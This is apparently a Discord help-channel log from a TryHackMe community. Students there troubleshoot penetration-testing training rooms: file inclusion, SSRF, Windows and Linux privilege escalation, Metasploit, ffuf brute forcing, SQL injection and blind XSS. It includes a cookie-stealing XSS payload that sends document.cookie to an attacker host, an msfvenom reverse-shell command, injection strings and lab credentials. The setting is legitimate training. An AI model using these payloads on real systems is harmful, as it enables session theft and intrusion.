In that case why it returned 200 ok response?

Are you doing that task from your own machine or the attackbox ?

Hi, I have problems with the room "Vulnerability Capstone". I have tried different exploits but at the end I get the same reaction none.

Python Script used is in the picture

I tried it with this command but did not get any response.
┌──(kali㉿kali)-[~/thm/VulnerabilityCapstone]
└─$ python 47138.py
cmd:"whoami"

I had the same problem. Try using the fuel cms exploit that is in the /usr/share/exploits/vulnerabilitiescapstone file path

Should be called exploit.py

nothing happens.. it kinda ignores the command being inserted. The javascript event is not triggered

what are the credentials for the machine in Windows Privesc room?

it just says NOTE: The machine attached to this task is the same as the one used in task 4.

but there are no credentials in task 4 either

user:password321 ?

am I doing something wrong?

I wasn't sure that was right, it was kind of a guess.

found the same user/pass in setup script but it's not working and the credentials aren't specified in the room

of course this happens when I get to windows machines 😄

Are you talking about that room? https://tryhackme.com/room/winprivesc
As if yes, the credentials are in some of the upcoming tasks, I guess they just forgot to put them in the first few.

Username: user
Password: Password1

It's in task5 instead of task 4 -.-

@shadow echo tnx 🙂

Just finished this path. Pretty good stuff and it was a great refresher on basics!

I'm stuck on the challenge at the end of file inclusion

I have my web server running but it's not connecting

I run http://10.10.140.24/playground.php?file=http://<my ip>/cmd.txt but it doesn't work

ok it just randomly worked

hello

in the SSRF room at the end we do a directory traversal by redirecting to x/../private

why x though ?

why not just ../private

Hai guys ... anyone familliar with the "Poor Man's Pentest" by john Hammond.
The thing is I was trying to add the scripts to my path to make them s/m commands .... (to avoid using./name everytime). But its not working ... i mean ... i have added the path but i can find that commends. ?

x/../private != ../private
x/../private == /private

you go into x, go back up one directory and then enter private - so it's a way to bypass restricted access to /private I guess, don't remember the exercise.

ok I see

what’s x ?

any allowed dir

lets say a filter looks if you are going to /private or not

if you do x/../private you can fool it for example

ok so there has to be an x folder

yep, the allowed one

alright thank you, they don’t mention the x folder whatsoever

too late to open the room now 😄 Is the chapter about bypasses?

I kinda interpreted stuff from the question

yes it’s about bypassing a deny list rule

yep that's it then

you get into the allowed one - that's x to just go up and into the denied one

to my understanding /private is just anything that’s private right ? they don’t specify what it is

exactly

x - allowed
private - denied

it’s called x and private just for the sake of the exemple right ?

yep

just to be sure

ok thank you

np 🙂

happy hacking 🙂

thanks you too 😎

Hi im on the windows priv esc room task 2

I'm a bit confused on how I can connect to the room

it's in task5..user/Password1

typos in nmap01-Task3:

range: 10.11.12.15-20 will scan 6 IP addresses: 10.11.12.15, 10.11.12.13.16,… and 10.11.12.13.20.
(the last 2 are not valid IP addresses (5 octets).

(If you don’t want Nmap to the DNS server, you can add -n.)
missing word (e.g.): ...Nmap to [contact] the DNS server...

Hello, I am working on the BurpSuite module (Decoding) part. I am unable to copy one of the keys into the Decoder module in Burp suite. Is there a workaround for this?

Why would you be unable to do so ?

I have downloaded the key files and copied one of them from the terminal and when I right click on the decoder module in Burp, no option shows up?

I have searched online and apparently some versions of Burp limits copying and pasting both in-and-out from Burp

I am not sure if this is the reason?

What about pressing CTRL+V ?

Didn't work

Are you using the attackbox or your local machine for burp ?

attackbox

And where did you download the key files? On the attackbox or your local machine ?

on the attackbox

That was the instruction if you are using the attackbox. Download by using wget

If you create a new file on the attackbox, can you even paste the key files in that new file? As somewhat that sounds as you didn't even copied the key file contents in the first place

I have copied the key value. I have tested it by creating a test file and copying it to the file

Mh, I mean I can try if it's working for me. Which key file did you copy ?

AlteredKeys.zip

No, which of the keys inside that file did you copy ?

key1

I didn't try other key files

Just tried it myself on the attackbox and it works just fine.

turned it off and on again and it's working now... not sure what the issue was

hi all...are there any coupon available for premium subscription?

Doubt it but there’s a student discount.

does taking the THM Junior penetration tester path would be enough to pass the eJPT? thanks

It’s good prep but I’d do the PTS course in addition to this path.

Hello guys, hope everyone is having a good afternoon. Currently doing the File Inclusion and I am stuck on the first question of challenge 8. I've changed the request from GET to POST already and setup the parameter correctly but not sure why it doesn't work. I was going to upload the screenshot here but it's not letting me.

I changed the request from get to POST and setup the parameter as file=../../../../etc/flag1

Hint: Change the form method to POST in the page source or use a tool like Burp to modify the method of the request POST.

Solved it meanwhile ?

Yeah I did

Used curl instead and for some reason it worked

was using burpsuite

Most probably because you were missing a specific header, as you probably captured the initial request as a GET request in Burp. And curl adds this header on it's own when specifying to do a POST request 🙂

Stuck on linux privesc etc/crontab

how do I get to the file so I can change it?

Get to what file ?

to the backup file

Change to the directory it's in ? To /home/karen ? I'm not quite sure if I fully understand what you mean

Im not sure I do either. Im lost as hell

So if you enter pwd, what`s the output you get ?

I can get to home/karen

but when I cat backup.sh. It goes "cd/home/admin/1/2/3/Results

Could you answer my question 🙂 ?

/home/karen

Okay, so you are already in the right folder. You know what cat is doing, yes ?

yes, it usually prints (concacenates)

Right, because I was a bit confused that you said "It goes "cd/home/admin/1/2/3/Results" " so all you have to do is changing the file contents of backup.sh as shown in the task

In the walkthrough for the module when they cat, the backup.sh comes up. I haven't seen anything yet where it cats a file path (that I cant navigate to) and a zip.

That are the original contents of that file, if you scroll a bit further down you can see to what they changed the backup.sh to

yes i understand that. I dont know how to reach the file I cat so that I can change it.

You are already in the same directory as the file (/home/karen) so just use an editor like nano or vim, or just echo the new file contents into backup.sh ?

light bulb*

I was overthinking this. I just need to put my script in place of what backup.sh currently is and save it. Wow.

Right 🙂

Thanks for your help! And thanks for your patience.

can I ask someone about this room, I'm stuck on task5.

Always ask your question straight away 😉

idk how to slove this task

So you got a meterpreter session on the target machine already?

Yes

Well that doesn't look like a meterpreter session, but then you just background the session with ctrl + z and then search for a hashdump module in msfconsole. If you found such a module, use it, set the session to the session number that you have in the background and run it

Can I dm u?

I would prefer to write here, so others could help as well

I try all "hashdump"

But it's not working.

Well then you might have to get a meterpreter session on the target machine rather then a normal shell.

So try to run the initial exploit to gain a session again, but this time pick a meterpreter payload

I use payload

But it's not working.

That's not a meterpreter payload. Search for "meterpreter"

That's right?

Yes

It's still not working.

Maybe restart the target machine, you ran that exploit quite often now, so maybe the machine is messed up somehow. Or in case the payload that previously worked is still working now, you could get a normal shell and then use the "shell_to_meterpreter" module to upgrade your basic shell

It's work now. Thank you.

Hello,
I'm currently going through the last challenge of the Linux Privesc and the find command seems to just not work?

I tried restarting the machine a few times and have noticed this problem in other challenges/machines.

Has anyone else had this issue before?

How do you know there should even be something with SUID or SGID set ?

Well from the previous tutorials, it's always nice to check and see if there is a suid/sgid bit set

Sure, it's fine to check. But you said there is a problem/not working because it's not returning any results ?

Yes, there are no results.
It just waits a bit and returns nothing.

I'd like to not use any script (at least keep it as a last resort)

It seems the '2>/dev/null' does not work

It seems you used 04000 instead of -04000

Thanks, it works

Gave +1 Rep to @shadow echo

i've been banging my head on a tryhackme room task where I need to compile a C program to gain root access and it is not getting executed in the target machine having an error of 'exec format error'. Ended up I have compiled the program using ARM but the target is using x86-64 hence it is not working. Cons of using M1 chip macbook for pentesting, used the attackbox to workaround on this one. all good ❤️

you might be able to compile the exploit on the target machine too sometimes

Currently working on the Authentication Bypass Room (Brute Force Section), and am not getting the "username/password" output from the command provided in the questions. Instead my output is :: Progress: [40/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:: Progress: [195/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [348/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

The terminal is also in the same directory as valid_usernames.txt

if you run the command below (capture1.png) it will return you this in the text document (capture.PNG) but you need to use this wordlist after, so i create an other .txt with nano Capture3.png and use this new wordlist with just the username and not the otherthings, and the command to find username/password worked

or maybe there is an other way to better save the username after the first command 😉

Right, I think I am in the next step. I already saved the output of ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.74.234/customers/signup -mr "username already exists" to a .txt file. Next step requires using that .txt file to brute force the password

Yes but look at the file you save? What is in the file?

Because when I use it, the file contain name and other things and It didn't work. But by created a new file with just the username, and use this file in the command, everything worked

Oh I see

Sorry I'm French so my English is not very good ^^

No worries, let me try that

Yes tell me if it's works

Okay so the error I am running up against basically lies in the output that is put into the .txt file

When I was editing in Nano, it somehow would erase or not read anything except for "Steve". So I basically created a new text file called "valid_usernames.txt" and just wrote the 4 usernames in and used that file to brute force and it worked

can someone help me understand ffuf. I know what it's doing but i don't understand the output

what is this "size" thing all about with ffuf

Really nice, I did the same! Good job

The length of the response? Not sure where you're looking

Length of the response is a quick metric for whether the response is different. It's worth remembering you could have the same length response with a different response but it's not that likely. Length is fast.

Hi everyone, I need some help in the Metasploit: Exploitation room.
I'm doing the msfvenom part and I have the following problem:
I generated the Payload via:
msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = 10.10.X.X LPORT = XXXX -f elf> rev_shell.elf
After that, I imported it into the target and did:
chmod + x rev_shell.elf.

In the meantime in the attacking machine I have started exploit/multi/handler and set the same LHOST and LPORT of the generated payload.

Once the payload has been executed in the target I am returned the error:

"Segmentation fault (core dumped)"
I can't find a solution, can you help me?

Don't use >
Use -o for output file.

@merry night this is still an error in the room, only two characters need changing

You did not mention if you set the payload of the handler!?

It should be identical to the one uploaded.

Is the submit button broke in the File Inclusion room for Task 4 Question 1 Lab #1 I submitted question 2 but I do not even get an error message for number 1

Just submitted it on my phone just wasn’t working when trying to submit on the computer

Can I suggest for Task #6 - Question 2 in File Inclusion that the answer format be changed to match what is displayed instead of _ for answer format make - or is it supposed to be misleading? Took me a minute to figure out why the answer was not working.

anyone know why on the auth bypass room ffuf isnt returning an output for the username/pass question

copied the provided command and just changed the file paths to match where my files are

Which task are you on? @trim pasture

Can somebody explain like I'm 5 why on steel mountain I can put a exe in the file system one directory up from the program exe under a different name than the program exe and it still executes my exe when it restarts

oh god where are your parents... why are you on the internet without parental control...

Services starting exe's with random names make me want to go back to being 5

Do you want the short answer or the detailed answer?

Whichever you feel

I should probably just run through a windows priv esc room

Right, time for the short answer and ask more questions if you need

So ok, you've got a command "C:\Program Files\test file.exe"

Okay

Is that a program called "C:\Program" with the arguments " Files\test file.exe"?
Is it "C:\Program Files\test file.exe" with no args?
Is it "C:\Program Files\test" with arg of "file.exe"?

Windows is bad at understanding this, it's something called unquoted service paths

Or more generally unquoted search paths, but in this case it's the path for a service

Okay I get it now

That's wild that they allow spaces like that

Thank you for that

The fix is quoted paths, but people are lazy and the Windows API is broken leading to bad code

They have a space in Advanced Care so the exe can be Advanced.exe in the folder above "Advanced Care"

That's kinda funny honestly

Thank you so much for that @idle bison

Gave +1 Rep to @idle bison

https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths

Lol so literally any unqoted path in "Program Files" is exploitable

Wild

Except you have to be able to drop files in the right place for it to be exploitable. You can't drop files in C:\Program unless you're admin. You also can't create new files in C:\Program Files unless you're admin (by default).

Dang. Dreams crushed

Anyone have a list or pdf of all the options to add after a command and their functions/when to use them? I am referring to the options such as -sC, -Sv, -u, and etc.... I am little lost of when to use them and how to use them effectively. Nor can I find a list of them

.

hello

in the SQLi room in the Blind SQLi - Boolean Based section there is a {"taken":true/false} API that tells us whether the username is taken or not

we then use this API to check if something exists in the DB by checking if the value is true

for instance with admin123' UNION SELECT 1,2,3 where database() like '%';-- the value of taken is true so we know we have a result from the query

but I don't understand how the API works, like why does it give us true when there's a result for the query?

is it because when used normally it's simply supposed to check if there's en entry in the DB with the username that we've input ? so when using UNION it checks for any result from the whole query and not just the username part right?

maybe it just checks if the query returns anything

if not, it will return false

ok that's what I thought I wanted to be sure that it's not something more complex than that

thank you

you can use the man command followed by the command you want to know more about

sometimes the command you want to use followed by --help can give you some info

Besides what @signal oak mentioned, you can use duckduckgo.com and search for <name_of_app> cheat sheet. DuckDuckGo has an extra tab for cheat sheets.

thanks

Gave +1 Rep to @drifting cargo

That's what the manuals are for

the man command in linux gives you a manual page for the command name that you provide (example man nmap will give you the manual page for nmap) which is really useful and lists all the parameters/flags/options you can supply and what they do... from there you should be able to understand on your own when they are useful to use

if that is not good enough you are probably looking to see other peoples notes on the commands and stuff

which some people claim is very private information and might not want to share

Understandable, thank you all for the responses and help

no problem

hallow i am doing subdomain enumeration and i am stuck with this kind of error when i run ffuf command state /usr/share/worlists/ so on so forth

any help please

am using kali in my browser

What error?

state /usr/share/worlists/ this is the error it displays in the terminal

Share a screenshot. It looks like you misspelled “wordlists”

if you're trying to do the seclists with your own kali

i had to install it

any clue why im having this error?

-p takes one argument, a port

It needs to directly follow the -p flag

thanks ❤️

what FUZZIng tools do you like and why? I've never heard of FFUF till taking the THM courses. I have heard of and seen most of the youtubers use gobuster. I was suprised to see FFUF being MUCH faster than gobuster which is why i'm asking the question. Am i just not using gobuster correctly

when i fuzz directory it gives me process error any one who can help me up

can you share your code and what the error is

i cant send the screenshoot

will send you privately just accpent me

!docs verify

Verify and you are able to send screenshots 🙂

And just as a suggestion, read the #rules to not get in trouble with a mod 😄

in metasploit:exploitation rom at task 5 i getting " Exploit completed, but no session was created" this message

anyone know why i am getting this message

Check your options and maybe post a screen of those in here

okay

here is my screenshot

Maybe try to enter the IP as the LHOST option rather then the interface name. Also maybe run ip a s and check if you only have a tun0 interface or any extra like tun1, tun2 etc.

Beside that, this exploit could fail several times, so maybe try to run it again 1 - 2 times and in case it's still not working restart the target machine. If all of that still doesn't solve the issue we can go from there

i have tried several time and getting same error message

however, i found that there is a tun1 exist in my system

Okay then that most probably causes the issue. Run sudo killall openvpn then connect to the vpn again, wait a minute and run ip a s again to make sure you only got a tun0 interface

now i got only tun0

Alright, then try the exploit again, if it's still not working restart the target machine

after restarting target machine i am getting this "[-] The target is not vulnerable." message

i have error on Authentication Bypass jr pentest path way brute force especialy in this room i try to post screen shoot but it is not a allowing me

any can help m,e up

Did you wait a good couple of minutes to make sure the target machine is fully booted?

!docs verify

You have to verify first in order to be able to send screenshots

thank you

Gave +1 Rep to @shadow echo

thank you, and i got my meterpreter shell

Gave +1 Rep to @shadow echo

@shadow echo what I need to do to get NTLM hash after hash dump

Get the right part which is the hash. The delimiter is :

done

I am on Task 8 Practical Example (Blind xss), I cannot figure out what ip/url to use in the support ticket.

</textarea><script>fetch(‘http://{URL_OR_IP}?cookie=‘ + btoa(document.cookie) );</script>

The IP of your attacking machine, so the machine where you want to capture the request that has the session cookie. Or as the URL that the request catcher provides you, as you can also capture the request there.

So it would be like this

</textarea><script>fetch('http://http://10.10.10.100/12799ebdff1f5576ca9d1a010b696557.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

Basically yes, but not 2 times http://http://

is there a / after 10.10.10.100 to connect the 12799.......

got it

damn that took a minute to figure out, thank you for the guidance @shadow echo

Gave +1 Rep to @shadow echo

So you captured the request, right ? As I don't think the request catcher starts with 10.10.10.100 🙂 Or does it?

where do i find discord token i need to join the chanell

I think I already sent you the link for the guide, but here you have it again: https://help.tryhackme.com/community/discord

i tried multiple way such us finding my token from developer tool i send it to the bot i can't upload any thing yet

how long does it take to me to be accepted

From the developer tools ? Did you not read the guide I sent you? You'll find the token on your tryhackme profile page

i read the token i got from developer tool in chrome i gave it